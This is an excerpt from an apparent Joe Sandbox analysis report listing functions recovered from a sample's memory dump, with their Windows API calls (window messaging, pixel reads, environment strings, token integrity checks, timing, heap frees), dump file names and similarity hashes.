Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 298a0485328511eb43110ded3f0ac39e8cc7f76df24df2ace38afa82cc3189da
Instruction ID: abe6575c3384d3a698ab875c883c12ce7a12ee5a294cafdc65c402cd9fd00880
Opcode Fuzzy Hash: 298a0485328511eb43110ded3f0ac39e8cc7f76df24df2ace38afa82cc3189da
Instruction Fuzzy Hash: D931AD75A00259EFCF04CFA8C9A9ADE3BB5EB05315F144229F962EB2D1C7709944CFA0

Function 00DE5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00DE5745
SendMessageW.USER32(?,00001074,?,00000001), ref: 00DE579D
_wcslen.LIBCMT ref: 00DE57AF
_wcslen.LIBCMT ref: 00DE57BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00DE5816

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 19fb0eb1f5e8ac53b489da5f0de7d4cb324d83bf842d2e1c9a6d5dcd3b5fd141
Instruction ID: 223dd3fe043d1f0d728ad0c7d7cc1daf230e90aef71e6b9c66bc110cd069e19f
Opcode Fuzzy Hash: 19fb0eb1f5e8ac53b489da5f0de7d4cb324d83bf842d2e1c9a6d5dcd3b5fd141
Instruction Fuzzy Hash: 1B2193319046989ADB20AF61DC84AEE77B8FF05368F148216E959EA1C5D7708985CF70

Function 00DD0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00DD0951
GetForegroundWindow.USER32 ref: 00DD0968
GetDC.USER32(00000000), ref: 00DD09A4
GetPixel.GDI32(00000000,?,00000003), ref: 00DD09B0
ReleaseDC.USER32(00000000,00000003), ref: 00DD09E8

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: a9aae18a9f600c37adceebc07455c2ce1dc267889bed83506a173c0e27120a1a
Instruction ID: bd6fd9579deb4619924153110677b36c66e5e04f8cf4eecd39b8cd75b99a374c
Opcode Fuzzy Hash: a9aae18a9f600c37adceebc07455c2ce1dc267889bed83506a173c0e27120a1a
Instruction Fuzzy Hash: C8215035600214AFD704EF69C894A5EBBE9EF84701F04846DE856D7362DA30AC05CB70

Function 00D8CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00D8CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D8CDE9

Part of subcall function 00D83820: RtlAllocateHeap.NTDLL(00000000,?,00E21444,?,00D6FDF5,?,?,00D5A976,00000010,00E21440,00D513FC,?,00D513C6,?,00D51129), ref: 00D83852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D8CE0F
_free.LIBCMT ref: 00D8CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D8CE31

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: e56d5ce80fd846c3dab70a61201c5d54c30fc66a520481162a13b7c53ee8a298
Instruction ID: c9b555dd217ca46591f2a478c731e1cf600b63b03af5023aea58df64b96fc8ee
Opcode Fuzzy Hash: e56d5ce80fd846c3dab70a61201c5d54c30fc66a520481162a13b7c53ee8a298
Instruction Fuzzy Hash: A3018472621755BF232236B66C88D7B696DDFC6BA13195129F905C7201EA718D0283B0

Function 00D69639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D69693
SelectObject.GDI32(?,00000000), ref: 00D696A2
BeginPath.GDI32(?), ref: 00D696B9
SelectObject.GDI32(?,00000000), ref: 00D696E2

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 1b31f2a55444b2d80a70125cbfdc781fd32b805751d774056654e5ffa2692b54
Instruction ID: c01486b9caae8be08cf5c38fb854973fd16eabbc808cf8539d5379d9c80ac110
Opcode Fuzzy Hash: 1b31f2a55444b2d80a70125cbfdc781fd32b805751d774056654e5ffa2692b54
Instruction Fuzzy Hash: 66219570811345EFDB219FA5DC647A97B68BBA1355F140255F410B61B0D3709ADBCFB0

Function 00DB5711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00DB5726
_memcmp.LIBVCRUNTIME ref: 00DB5744
_memcmp.LIBVCRUNTIME ref: 00DB5757
_memcmp.LIBVCRUNTIME ref: 00DB576F
_memcmp.LIBVCRUNTIME ref: 00DB5787

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 49c13ec394d5958da45a2b9dd1ea04a8ac0514fb2a6e1885d5dedf7032d5b20d
Instruction ID: b303b760af3aa6cbd78458015d091c1f1f6bf7b9dc4131082689be99953314de
Opcode Fuzzy Hash: 49c13ec394d5958da45a2b9dd1ea04a8ac0514fb2a6e1885d5dedf7032d5b20d
Instruction Fuzzy Hash: A701B575741609FFE2086615AD82FFB735CDB21398F244120FD0A9A245FB60EE1582B0

Function 00D82DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00D7F2DE,00D83863,00E21444,?,00D6FDF5,?,?,00D5A976,00000010,00E21440,00D513FC,?,00D513C6), ref: 00D82DFD
_free.LIBCMT ref: 00D82E32
_free.LIBCMT ref: 00D82E59
SetLastError.KERNEL32(00000000,00D51129), ref: 00D82E66
SetLastError.KERNEL32(00000000,00D51129), ref: 00D82E6F

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: f342fbca1230c4143d78a18f13a82383d24b69d25e7876557e0cdf41bce5b73f
Instruction ID: 6793db89a6d5bd3d93dce3bec22865197e56e685c10dba81c02cb07f1f9f6926
Opcode Fuzzy Hash: f342fbca1230c4143d78a18f13a82383d24b69d25e7876557e0cdf41bce5b73f
Instruction Fuzzy Hash: 3101F4323866007BC61337356C8AE3B266DEBC17B1B294028F865E22D2EF24CC014334

Function 00DB000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?,?,?,00DB035E), ref: 00DB002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?,?), ref: 00DB0046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?,?), ref: 00DB0054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?), ref: 00DB0064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?,?), ref: 00DB0070

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 60ff993396d6232798b9978e5e4077f361d6b6a953eac12eb8768324e8556496
Instruction ID: 83a22c2e91d948384dee1b12d0d952cd9887e8cb4a8846b02ca17adbed6404eb
Opcode Fuzzy Hash: 60ff993396d6232798b9978e5e4077f361d6b6a953eac12eb8768324e8556496
Instruction Fuzzy Hash: 83017872610304EBDB116F68DC84BAA7EADEB48792F145124F906DA210EB71DD418BB0

Function 00DBE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 00DBE997
QueryPerformanceFrequency.KERNEL32(?), ref: 00DBE9A5
Sleep.KERNEL32(00000000), ref: 00DBE9AD
QueryPerformanceCounter.KERNEL32(?), ref: 00DBE9B7
Sleep.KERNEL32 ref: 00DBE9F3

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: d0815c595a6b3a6742965871860c1d91a4578dcbcec58376a58927220a99c947
Instruction ID: 2d13377f4175f127eda9d2859450cf0d01ebbb7d939c0343278116a30c0f3869
Opcode Fuzzy Hash: d0815c595a6b3a6742965871860c1d91a4578dcbcec58376a58927220a99c947
Instruction Fuzzy Hash: 1C011331D01629DBCF00ABE9DC99AEDFBB8FB09701F000556E942B7241CB30A6598BB1

Function 00DB10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DB1114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB1120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00DB0B9B,?,?,?), ref: 00DB1136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DB114D

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: a3f2d5dc6934c6128ab8b4237295fb713df8b32b11b51198c9176e16e8a1adac
Instruction ID: 5f3fd633dec8bc08fcdcd90eac917bc5d1d2e12abc41da55aa59cb014ce28db8
Opcode Fuzzy Hash: a3f2d5dc6934c6128ab8b4237295fb713df8b32b11b51198c9176e16e8a1adac
Instruction Fuzzy Hash: AA016D79200305BFDB116F68DC89AAA3B6EEF863A0B140418FA45C7360DA31DC018A70

Function 00DB0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00DB0FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00DB0FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00DB0FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00DB0FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00DB1002

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 8f48fa036f202d0cca0a636921480b5c0390d3fec0aafe34232fb3978fa5cad4
Instruction ID: 7050e4a4130a42a7cd232927cbf11a52fd1e4da362b79a30433cf77b67a5db98
Opcode Fuzzy Hash: 8f48fa036f202d0cca0a636921480b5c0390d3fec0aafe34232fb3978fa5cad4
Instruction Fuzzy Hash: FDF04F39210345EBD7216FA49C8DF963B6DEF8A761F544419FD46CA351CA70DC418A70

Function 00DB1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00DB102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00DB1036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DB1045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00DB104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DB1062

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 14891a8e930f097bc05818a0e6e0bf5c3387c4429e1f3443991edfdd35f780c6
Instruction ID: 155908641950d4f238a14fa5b6ba57223cc686dc4f4c53061d3f47a8556511db
Opcode Fuzzy Hash: 14891a8e930f097bc05818a0e6e0bf5c3387c4429e1f3443991edfdd35f780c6
Instruction Fuzzy Hash: 87F06239210341EBD7216FA4EC9AF9A3B6DEF8A761F540414FD46CB350CA70D8418A70

Function 00DC030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00DC017D,?,00DC32FC,?,00000001,00D92592,?), ref: 00DC0324
CloseHandle.KERNEL32(?,?,?,?,00DC017D,?,00DC32FC,?,00000001,00D92592,?), ref: 00DC0331
CloseHandle.KERNEL32(?,?,?,?,00DC017D,?,00DC32FC,?,00000001,00D92592,?), ref: 00DC033E
CloseHandle.KERNEL32(?,?,?,?,00DC017D,?,00DC32FC,?,00000001,00D92592,?), ref: 00DC034B
CloseHandle.KERNEL32(?,?,?,?,00DC017D,?,00DC32FC,?,00000001,00D92592,?), ref: 00DC0358
CloseHandle.KERNEL32(?,?,?,?,00DC017D,?,00DC32FC,?,00000001,00D92592,?), ref: 00DC0365

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 09cec1c04694b3cf57430f7f208975bf2738aa2e8e5f97878fb1ae241ed99cef
Instruction ID: 2ba2cd87c86d15d9cd20019386dcefba8c0baad8c0c238fe6155bf604f7cc4e8
Opcode Fuzzy Hash: 09cec1c04694b3cf57430f7f208975bf2738aa2e8e5f97878fb1ae241ed99cef
Instruction Fuzzy Hash: F401A272800B56DFCB31AF66D880912FBF9BF503153198A3FD19652931C371A955CF90

Function 00D8D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00D8D752

Part of subcall function 00D829C8: HeapFree.KERNEL32(00000000,00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000), ref: 00D829DE
Part of subcall function 00D829C8: GetLastError.KERNEL32(00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000,00000000), ref: 00D829F0

_free.LIBCMT ref: 00D8D764
_free.LIBCMT ref: 00D8D776
_free.LIBCMT ref: 00D8D788
_free.LIBCMT ref: 00D8D79A

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e965c3235febddf77110bad050091ebb8fdae2ab6b5f5de75681e243e30665c7
Instruction ID: 8215f3b8ca538b7306dcbb3df07e233c1f8621a9da05061131f8a94457883ed6
Opcode Fuzzy Hash: e965c3235febddf77110bad050091ebb8fdae2ab6b5f5de75681e243e30665c7
Instruction Fuzzy Hash: 8FF0FF72584204AB8625FB69FDC5C6A77EEFB447107A94805F049E7581C734FC808B74

Function 00DB5C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00DB5C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00DB5C6F
MessageBeep.USER32(00000000), ref: 00DB5C87
KillTimer.USER32(?,0000040A), ref: 00DB5CA3
EndDialog.USER32(?,00000001), ref: 00DB5CBD

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: fcfd7bea396cb283976340e40efc48aa480f99d1a9b54e257c12e0fecf20e455
Instruction ID: ff1fc030d80256d833b6ef3357cf1833721668c4519435cbd323249c5feb68fd
Opcode Fuzzy Hash: fcfd7bea396cb283976340e40efc48aa480f99d1a9b54e257c12e0fecf20e455
Instruction Fuzzy Hash: A2018630510B44EBEB206B10ED8EFE67BB9BB00B05F04159DA583A51E5DBF0A9858AB0

Function 00D822A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00D822BE

Part of subcall function 00D829C8: HeapFree.KERNEL32(00000000,00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000), ref: 00D829DE
Part of subcall function 00D829C8: GetLastError.KERNEL32(00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000,00000000), ref: 00D829F0

_free.LIBCMT ref: 00D822D0
_free.LIBCMT ref: 00D822E3
_free.LIBCMT ref: 00D822F4
_free.LIBCMT ref: 00D82305

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 53664eb8cef8df4815413a6071fed77f6e5c18cb938217d2ef832ccdf27e8402
Instruction ID: 4235ff9d2ae3485031c19c36387b67f85d6d393b093fce9adebeb101751bd48a
Opcode Fuzzy Hash: 53664eb8cef8df4815413a6071fed77f6e5c18cb938217d2ef832ccdf27e8402
Instruction Fuzzy Hash: 6BF05E719C0120AF8632BF56BC418683B64F729760716054AF410F23B2C734195BAFF8

Function 00D695C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00D695D4
StrokeAndFillPath.GDI32(?,?,00DA71F7,00000000,?,?,?), ref: 00D695F0
SelectObject.GDI32(?,00000000), ref: 00D69603
DeleteObject.GDI32 ref: 00D69616
StrokePath.GDI32(?), ref: 00D69631

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
